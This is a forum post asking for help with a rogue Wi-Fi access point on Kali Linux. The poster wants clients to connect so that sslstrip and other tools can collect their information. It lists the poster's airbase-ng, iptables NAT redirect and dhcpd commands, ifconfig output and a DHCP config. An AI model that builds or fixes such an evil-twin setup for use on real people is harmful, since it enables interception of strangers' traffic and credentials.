hi im running kali on amd64 hdd install gnome with 2 wireless cards wlan0 and wlan1 and i want to make a rouge ap to have clients connect and i will have sslstrip and other tools collecting info i have been trying to setup a rouge ap with isc-dhcp-server and airbase-ng i have tried a few things and have been able to get clients ips but they dont recive internet (wlan0 is connected to internet and wlan1 will have the ap on it)

so here is the ifconfig

eth0 Link encap:Ethernet HWaddr 10:1f:74:0f:f1:cf
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:32 errors:0 dropped:0 overruns:0 frame:0
TX packets:32 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1920 (1.8 KiB) TX bytes:1920 (1.8 KiB)

wlan0 Link encap:Ethernet HWaddr 38:59:f9:75:e3:ce
inet addr:192.168.1.102 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::3a59:f9ff:fe75:e3ce/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7079 errors:0 dropped:0 overruns:0 frame:0
TX packets:2346 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2604757 (2.4 MiB) TX bytes:429234 (419.1 KiB)

wlan1 Link encap:Ethernet HWaddr 00:c0:ca:6c:a1:b3
inet addr:192.168.1.103 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::2c0:caff:fe6c:a1b3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4741 errors:0 dropped:0 overruns:0 frame:0
TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:622681 (608.0 KiB) TX bytes:1411 (1.3 KiB)

so i do these comands

airmon-ng start wlan1 1
airbase-ng -e rougeap -c 1 mon0
ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
echo "1" > /proc/sys/net/ipv4/ip_forward

my /etc/dhcp/dhcp.conf is setup as so

ddns-update-style interim;
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option domain-name-servers 8.8.8.8;
option routers 192.168.1.255;
range 192.168.1.100 192.168.1.254;
}

what am i doing wrong?